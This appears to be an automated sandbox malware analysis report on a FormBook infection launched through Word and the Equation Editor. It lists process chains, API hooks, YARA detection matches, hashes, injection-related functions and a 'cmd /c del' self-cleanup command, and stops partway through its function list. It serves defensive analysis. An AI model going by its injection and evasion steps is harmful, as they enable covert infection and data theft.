Jan 27, 2021 19:11:05.870007992 CET	952	IN	Data Raw: 2f 64 69 76 3e 20 20 20 20 20 20 20 20 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 62 6f 74 74 6f 6d 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0d 0a 20 20 20 20 Data Ascii: /div> <div class="headbottom"> <div class="container clearfix"> <div class="head-pad"> <h1><a href="http://www.Bucklandnewton.net">Bucklandnewton.net</a> <span class="whois"><a href="https://www.register.c
Jan 27, 2021 19:11:05.870034933 CET	953	IN	Data Raw: 65 64 2d 73 65 61 72 63 68 65 73 2d 63 75 73 74 6f 6d 22 3e 52 65 6c 61 74 65 64 20 53 65 61 72 63 68 65 73 3a 3c 2f 73 70 61 6e 3e 0d 0a 3c 2f 68 34 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 63 6c Data Ascii: ed-searches-custom">Related Searches:</span></h4> <ul class="clearfix"> <li><a href="http://www.bucklandnewton.net/Best_Penny_Stocks.cfm?fp=xxgIxI7UiKIysyJbasKr3qkagSXUTbni4HlnlmOoIcAot%2B9OAJwcAq6oH2zgH
Jan 27, 2021 19:11:05.960977077 CET	955	IN	Data Raw: 32 46 35 70 77 62 6e 5a 77 6c 37 6d 4f 6c 43 71 45 45 34 69 65 7a 65 43 79 46 34 56 51 7a 31 67 77 67 25 33 44 25 33 44 26 45 70 75 3d 7a 76 35 30 42 70 65 48 70 6e 6a 70 26 26 6b 74 3d 31 31 32 26 26 6b 69 3d 31 39 31 39 39 32 36 26 6b 74 64 3d Data Ascii: 2F5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg%3D%3D&Epu=zv50BpeHpnjp&&kt=112&&ki=1919926&ktd=0&kld=1042&kp=2" target="_top" onmouseover="changeStatus('Anti Wrinkle Creams');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showP

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2440 Parent PID: 584

General

Start time:	19:08:36
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13ffc0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1976 Parent PID: 584

General

Start time:	19:08:38
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 69577.exe PID: 1484 Parent PID: 1976

General

Start time:	19:08:41
Start date:	27/01/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0xcf0000
File size:	834536 bytes
MD5 hash:	5A7E3E87F007DA7D39BD5CB58CAC10D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: AddInProcess32.exe PID: 2824 Parent PID: 1484

General

Start time:	19:08:47
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xe00000
File size:	42176 bytes
MD5 hash:	DA55A7AED2F65D6104E1A79EE067CC00
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2824

General

Start time:	19:08:52
Start date:	27/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: systray.exe PID: 2396 Parent PID: 1388

General

Start time:	19:09:10
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0xc0000
File size:	8192 bytes
MD5 hash:	DF6923839C6A8F776F0DA704C5F4CEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2880 Parent PID: 2396

General

Start time:	19:09:15
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x4a9f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 69577.exe PID: 1484 Parent PID: 1976 69577.exeCOMMON

Executed Functions

Function 00258E49, Relevance: 4.7, Strings: 3, Instructions: 980COMMON

Download Yara Rule

Strings

(, xrefs: 002594DE
<, xrefs: 00259074
ntin, xrefs: 002598B7

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: ($<$ntin
API String ID: 0-2777557274
Opcode ID: e0ee38b44b212fa674619f9be8ca6e4724e12690b4f50955c31b87266d7b5a40
Instruction ID: 3bbe3f801cfdb6655d399bfdd11faf354740857f635501f25b6de66a661dc1bd
Opcode Fuzzy Hash: e0ee38b44b212fa674619f9be8ca6e4724e12690b4f50955c31b87266d7b5a40
Instruction Fuzzy Hash: CFA2E374E14219CFDB24CF99C981ADDBBF6BF89300F6480A9D908AB255D730AD85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006B52D0, Relevance: 4.7, Strings: 3, Instructions: 973COMMON

Download Yara Rule

Strings

ntin, xrefs: 006B5D3F
(, xrefs: 006B5966
<, xrefs: 006B54FA

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: ($<$ntin
API String ID: 0-2777557274
Opcode ID: 8110e9f0b407ea98da306f9f1f0b767451f3470527111121137546c17ae7edce
Instruction ID: 71672e7a186fdfcb5233805839a210305091f92044db6b5459e02d4ea26ee107
Opcode Fuzzy Hash: 8110e9f0b407ea98da306f9f1f0b767451f3470527111121137546c17ae7edce
Instruction Fuzzy Hash: A1A2B3B4E046198FDB14CF99C981BDDBBF6BF89300F2481A9D509AB255D730AE82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00254FD0, Relevance: 3.3, Strings: 2, Instructions: 779COMMON

Download Yara Rule

Strings

<, xrefs: 00255295
@, xrefs: 00255A75

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 47cff10151eedac616823da391cf45d6c2cd826aef145dd222885e48f22a9a70
Instruction ID: dda05393adbf4d983809d3453b628dffdaffbf2a4f08dad1d0d1c3682ae229d5
Opcode Fuzzy Hash: 47cff10151eedac616823da391cf45d6c2cd826aef145dd222885e48f22a9a70
Instruction Fuzzy Hash: AA82137091066ACFDB24CFA8C985A9DFBF2BF88305F55C1A5E809AB212D7309D85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 006B13D1, Relevance: 3.1, Strings: 2, Instructions: 649COMMON

Download Yara Rule

Strings

<, xrefs: 006B1505
@, xrefs: 006B1CE5

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 744126d596e64e5a52c6d0d1f437d519e41b2bddabf1141b7734bf99f54589f4
Instruction ID: 92a73938b7e1449ceafa7dd08e2a89ae2e7fc39a85861a4253af9c9c93d79dad
Opcode Fuzzy Hash: 744126d596e64e5a52c6d0d1f437d519e41b2bddabf1141b7734bf99f54589f4
Instruction Fuzzy Hash: E962C0B490025ACFDB24DFA9C985ADDFBF2BF89304F5581A9E509AB212D7309D81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B7138, Relevance: 3.1, Strings: 2, Instructions: 582COMMON

Download Yara Rule

Strings

tR=, xrefs: 006B71C7
L_=, xrefs: 006B720B

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: L_=$tR=
API String ID: 0-384011588
Opcode ID: f717d2c859ccc6bc78d086750494efc9e13e27cfbc8f70c7dc45ff62fff43f4a
Instruction ID: 9258b290fd92cfbc7589de4ec90282e59c403634abbb14bb2cbafe980a506c81
Opcode Fuzzy Hash: f717d2c859ccc6bc78d086750494efc9e13e27cfbc8f70c7dc45ff62fff43f4a
Instruction Fuzzy Hash: 0552E274E002198FDB65CFA8D944BDDBBF6AF88305F5081A6E409A7360EB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B99D9, Relevance: 3.0, Strings: 2, Instructions: 518COMMON

Download Yara Rule

Strings

L_=, xrefs: 006BA147
h, xrefs: 006B99D9

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: L_=$h
API String ID: 0-1451041710
Opcode ID: 371007b68821a17645abed2f1143ebb1e80dfb0e2735b198db68e100a5269800
Instruction ID: 9896e36ec9979221bc3b346a9eaf3abaf245cb0aec20e4220f38ef884ffbe4c0
Opcode Fuzzy Hash: 371007b68821a17645abed2f1143ebb1e80dfb0e2735b198db68e100a5269800
Instruction Fuzzy Hash: 852239B0E002188FDB68DFA5CC807DDB7B6AF98315F5485A9D608AB344EB705E81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00255C5A, Relevance: 1.8, Strings: 1, Instructions: 506COMMON

Download Yara Rule

Strings

cl, xrefs: 002563A3, 002563A8

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID: cl
API String ID: 0-4008018315
Opcode ID: 3fc213c29132fc8a9b6df13b464c7c3839d8440c7af8301fcc6dad442510942a
Instruction ID: ec562ddce0350e3a2648cfe7a6993faa87024355d45a02a52cbe96aedcc91e82
Opcode Fuzzy Hash: 3fc213c29132fc8a9b6df13b464c7c3839d8440c7af8301fcc6dad442510942a
Instruction Fuzzy Hash: 4632E37091025A8FDB60DFA8C589A8DFBF2BF85305F55C5A5E808AB212CB30DD85CF65

Uniqueness

Uniqueness Score: -1.00%

Function 006B11E0, Relevance: 1.8, APIs: 1, Instructions: 253processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,006B820D,?,?,?), ref: 006B8474

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 88dd41565c3f9fd3f812f1b269c1805dd7b03edd9a2eefbb2eec54843a5e1627
Instruction ID: e804f71cc39dcb8bab01a8ca18c7775ea479d914184188d8367b1c5e29316970
Opcode Fuzzy Hash: 88dd41565c3f9fd3f812f1b269c1805dd7b03edd9a2eefbb2eec54843a5e1627
Instruction Fuzzy Hash: B391BEB5D0022D9FCF25CFA4C880BDDBBB5AF0A304F1495AAE548B7250DB709A85DF94

Uniqueness

Uniqueness Score: -1.00%

Function 006B4BA0, Relevance: 1.7, Strings: 1, Instructions: 484COMMON

Download Yara Rule

Strings

jN, xrefs: 006B4C86

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: jN
API String ID: 0-1675516797
Opcode ID: d4f6569c33fa4b9ea4f47c1599cee4e17300d07ae85a8102985e5eb57dc2fd63
Instruction ID: 352d41945906f3ef3c8629d9b92a9e6b7d3fe342fcccb1003b8d6c890c0eb40b
Opcode Fuzzy Hash: d4f6569c33fa4b9ea4f47c1599cee4e17300d07ae85a8102985e5eb57dc2fd63
Instruction Fuzzy Hash: 9332B1B09002598FDB60DBA8C585ACDFBF6BF88315F55C5A5E509AB212CB30DD85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 006B30E1, Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e6e1c2e5cf2e7d1717efcfc0baa785b9cd26490f7124c952acc5ed1b426ac9
Instruction ID: 14462dd7845e31c0adf298d26836ed3360e8968e53b5114155c892139f352143
Opcode Fuzzy Hash: 58e6e1c2e5cf2e7d1717efcfc0baa785b9cd26490f7124c952acc5ed1b426ac9
Instruction Fuzzy Hash: 984272B4E01229CFDB54CFA9D984B9DBBB6BF48300F1485A9E809A7355D730AE81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006B1DB9, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e05347b4e9c67125dab3b6ebc9ca05f3e70e7d06984ef8cb6916a6c85f9f3c
Instruction ID: 63b7b1188c71a6c9bed67224c2e2fa110cead0a603d1cc015ccc4e80d8a2d318
Opcode Fuzzy Hash: 89e05347b4e9c67125dab3b6ebc9ca05f3e70e7d06984ef8cb6916a6c85f9f3c
Instruction Fuzzy Hash: A032D1B490025A8FDB60DFA8C585ACDFBF2BF89305F55C5A5E508AB212CB309D81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0025A66A, Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9847b74b95d483be47c0f5aea1c55132e24d2d3269633f5bd1fd4296f69ef3b3
Instruction ID: 00ac078daea412c7614fe8edd04b44068abb4feae0165bf9fba5384509f2c256
Opcode Fuzzy Hash: 9847b74b95d483be47c0f5aea1c55132e24d2d3269633f5bd1fd4296f69ef3b3
Instruction Fuzzy Hash: C322F374E11228CFDB64DF65D884BACBBB2BF49302F1085AAD40AA7350DB359AC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 006B6448, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4d40fa9eb362c2c144fbe709b4766357195a8b1a16edaadfc08fdd1cb3db64
Instruction ID: 41f8ffc8a0c9fd1ec79bb12f9981b0bb62857f9660e65ae98710457b59f3e271
Opcode Fuzzy Hash: 9a4d40fa9eb362c2c144fbe709b4766357195a8b1a16edaadfc08fdd1cb3db64
Instruction Fuzzy Hash: 3AE109B4E101198FCB14DFA8C5809ADBBF6BF88304F248169E815A735ADB34AD81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0025AE68, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e69e26abe7825691209746eddf93f1eaf7543dc34a7fc50fe298b512c9ddf3
Instruction ID: d56669f9cb2b7c377b06148a0b0da5aa2a26a78a155e7ed8e88fd3e442253e52
Opcode Fuzzy Hash: c5e69e26abe7825691209746eddf93f1eaf7543dc34a7fc50fe298b512c9ddf3
Instruction Fuzzy Hash: BBD1DF74E00218CFDB54DFA9D984B9DBBB2BF88305F1085AAE809A7354DB305E95CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0025E748, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b927148d88157eb12cceb9681ad446886b248ea7e1f3f706964672fe2a7201e
Instruction ID: d6c971b8f78af7dc93932a3ae64c88baefd13f390cc827b49f25d8aab29e538e
Opcode Fuzzy Hash: 9b927148d88157eb12cceb9681ad446886b248ea7e1f3f706964672fe2a7201e
Instruction Fuzzy Hash: D4D1D1B4D10218CFDB18DFA5D988B9DFBF2BB49305F20916AD809A7354DB305A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025E738, Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37608f25192ae40a5be2080b02e34d9d6fb0002472df3b561473a972922973c
Instruction ID: 9eef9c5c36885396c7e5edfe232ed4ad5966d9a0ea43af166009b892ee39ea91
Opcode Fuzzy Hash: d37608f25192ae40a5be2080b02e34d9d6fb0002472df3b561473a972922973c
Instruction Fuzzy Hash: 9AD1D1B4D10218CFDB18DFA5D988B9DFBF2BB89305F2091AAD809A7354DB305A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025B919, Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90f8a4f482c9b049f139e62b6a467d04288a3f9b7d1a852f5adb6f55af26128
Instruction ID: 6fba5e186ca537c35095650b66eba7f2b97c8aa2f164e0cfba4d71d4be347175
Opcode Fuzzy Hash: b90f8a4f482c9b049f139e62b6a467d04288a3f9b7d1a852f5adb6f55af26128
Instruction Fuzzy Hash: E6B1E274E10218CFDB14DFA9C840ADDFBB6BF89315F5485AAD808AB315EB309985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0025AE66, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541af01f33148c2ed7a1a1345ae4b8e5cf3b43adec0930a90ada7a7245761ae2
Instruction ID: 6c514a6ed0c62fe44f9715b0faf74188f2f76b02e914a6168099b9b589626a2b
Opcode Fuzzy Hash: 541af01f33148c2ed7a1a1345ae4b8e5cf3b43adec0930a90ada7a7245761ae2
Instruction Fuzzy Hash: 7DA1DF74E00618CFDB54EFA9D984B9DFBB2BF88300F1085AAD849A7265DB305A95CF11

Uniqueness

Uniqueness Score: -1.00%

Function 006B6439, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d397b19411b8949b2ff2ad3fb9a968ce59dc5a8e59d0bfe7e2e4480205158c
Instruction ID: 2f51d5d8c36f6a6f01d1a30e7dc8fef8d8e5cd47094598078f2de182fc293076
Opcode Fuzzy Hash: 29d397b19411b8949b2ff2ad3fb9a968ce59dc5a8e59d0bfe7e2e4480205158c
Instruction Fuzzy Hash: 0C511CB1E146198BCB14CFA9C5809EEFBF6AF89304F24C169D418A735AD7349D41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00257388, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a8d370f4edfbf24dc3019e007b58d867a639d0c63197554045950574ee0237
Instruction ID: eb78bd4803d86b2976865d245601153b62fbf7af23f2595a8fb0c2653b06a7de
Opcode Fuzzy Hash: 04a8d370f4edfbf24dc3019e007b58d867a639d0c63197554045950574ee0237
Instruction Fuzzy Hash: A351D475E11218DFDB18CFAAD984B9EBBB6FF88300F14C1AAD809A7264DB305945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025F7E8, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18539ed7c4b99bcf3f6bed6e0f88bcf693fb2e9fb2d4c1e32aa79b24dcc6c33f
Instruction ID: 63f10dcb2a99de490f84571251150e4ff0527167148da085c175d11f0d8b8a84
Opcode Fuzzy Hash: 18539ed7c4b99bcf3f6bed6e0f88bcf693fb2e9fb2d4c1e32aa79b24dcc6c33f
Instruction Fuzzy Hash: DC012870C19209AFCB41DFB4D9486EEBFB0FB0A305F1085AEC418B3292D7704A84CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00256704, Relevance: 1.8, APIs: 1, Instructions: 273COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0025FB89

Memory Dump Source

Source File: 00000004.00000002.2108487372.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 3c42f7ad2af2d6cf725459e4c6f8b2215b0ccc8464aa09aadbbed58b7543969e
Instruction ID: fba8cdfe4855b8faded309910a977e57f5008fdd628870098a18aee4a3358011
Opcode Fuzzy Hash: 3c42f7ad2af2d6cf725459e4c6f8b2215b0ccc8464aa09aadbbed58b7543969e
Instruction Fuzzy Hash: 18C1F070E10219CFDB64CFA8C981B9EBBB1BF49304F2481AAE809B7351D770A995CF45

Uniqueness

Uniqueness Score: -1.00%

Function 006B827C, Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,006B820D,?,?,?), ref: 006B8474

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 2cd07c16c4960c86b7742c0b53ae0337cfe2ae28af31eac1a3a0b6d8e89a3afc
Instruction ID: 9dce691d200df9b9b349a94c8505ca49837dc5dd69b07d679ce8f2190d13a995
Opcode Fuzzy Hash: 2cd07c16c4960c86b7742c0b53ae0337cfe2ae28af31eac1a3a0b6d8e89a3afc
Instruction Fuzzy Hash: 3891BEB5D0026D9FCF25CFA4C880BDDBBB5AF0A304F1494AAE548B7250DB709A85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 006BB458, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006BB533

Memory Dump Source

Source File: 00000004.00000002.2108813317.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8d7789642bd204fe1bf61f2cd0c3f631cacc9c359093c4b1f38e31b9efaf6a4a
Instruction ID: 9dbb590088b8258181f898a7a763af8901f3ce75a25f6426c707235d62b16b0b
Opcode Fuzzy Hash: 8d7789642bd204fe1bf61f2cd0c3f631cacc9c359093c4b1f38e31b9efaf6a4a
Instruction Fuzzy Hash: 7D41B9B5D012489FCF10CFA9D884AEEFBF1BB49304F20942AE819B7200D378AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 006BB460, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

